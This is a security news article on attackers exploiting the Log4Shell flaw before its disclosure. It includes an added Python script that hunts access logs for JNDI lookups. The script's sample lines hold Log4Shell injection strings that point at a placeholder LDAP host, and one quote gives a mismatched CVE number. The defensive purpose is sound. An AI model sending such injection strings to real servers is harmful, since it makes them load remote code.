Researchers have discovered that threat actors had been exploiting the critical Log4Shell flaw in the Log4j library at least one week before its public disclosure.

NetLab360 researchers have revealed that attackers attempted to trigger the Log4Shell flaw in the Log4j library on their Anglerfish and Apacket honeypots, and have used the vulnerability to build Muhstik and Mirai botnets that target Linux devices.

The Cisco Talos team said in a blog post that it has observed attacks against the vulnerability, tracked as CVE-2021-44228, since December 2.

“Cisco Talos has observed attacker activity related to CVE-2021-22448 beginning 02-December-2021. It is recommended that organizations expand their hunt for scanning and exploit activity to this date.” reads the blog post published by Cisco Talos.
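
One way to act on that recommendation, as an added example that is not from the original article or from Cisco Talos: the Python below scans web access-log lines for Log4j JNDI lookup strings dated 2 December 2021 or later. The combined access-log format, the `${jndi:` indicator, the function names and the sample lines are assumptions made for this example.

```python
import re
from datetime import datetime, timezone
from urllib.parse import unquote

# Earliest attacker activity reported by Cisco Talos in the article.
HUNT_START = datetime(2021, 12, 2, tzinfo=timezone.utc)
# Timestamp of the common/combined access-log format (assumed log format).
TS_RE = re.compile(r"\[(\d{2}/[A-Za-z]{3}/\d{4}:\d{2}:\d{2}:\d{2} [+-]\d{4})\]")
# Start of a Log4j JNDI lookup; obfuscated variants need additional rules.
JNDI_RE = re.compile(r"\$\{jndi:", re.IGNORECASE)

# Constructed sample lines (documentation-range addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Dec/2021:23:59:01 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [02/Dec/2021:04:12:45 +0000] "GET / HTTP/1.1" 200 1043 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '192.0.2.10 - - [05/Dec/2021:10:00:00 +0000] "GET /shop?tpl=%24%7Bprice%7D HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [11/Dec/2021:17:30:09 +0000] "GET /?q=%24%7BJNDI%3Aldap%3A%2F%2F203.0.113.5%2Fa%7D HTTP/1.1" 404 0 "-" "-"',
]

def decode(text, rounds=2):
    """Percent-decode up to `rounds` times to expose single- and double-encoded input."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def hunt(lines, start=HUNT_START):
    """Return sorted (timestamp, source, line) tuples for JNDI lookups at or after `start`."""
    hits = []
    for line in lines:
        stamp = TS_RE.search(line)
        if stamp is None:
            continue  # no parseable timestamp; review such lines separately
        when = datetime.strptime(stamp.group(1), "%d/%b/%Y:%H:%M:%S %z")
        if when >= start and JNDI_RE.search(decode(line)):
            hits.append((when, line.split(" ", 1)[0], line))
    return sorted(hits)

if __name__ == "__main__":
    for when, source, line in hunt(SAMPLE_LOG):
        print(when.isoformat(), source, line)
```

A hunt window that starts later than 2 December would miss the first constructed hit, which is the reason to extend the search back to the date Talos reports.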

Microsoft research teams also confirmed attacks using Cobalt Strike beacons and coin miners.

“Based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives. Microsoft has observed activities including installing coin miners, Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems.” reads the statement published by Microsoft.

Tweet published by Cloudflare CEO Matthew Prince: https://twitter.com/eastdakota/status/1469800951351427073

Security researchers at Huntress Labs have created a tool that organizations can use to test whether an application is vulnerable to the flaw. Sophos also commented that it had observed the flaw already being exploited by crypto miners.
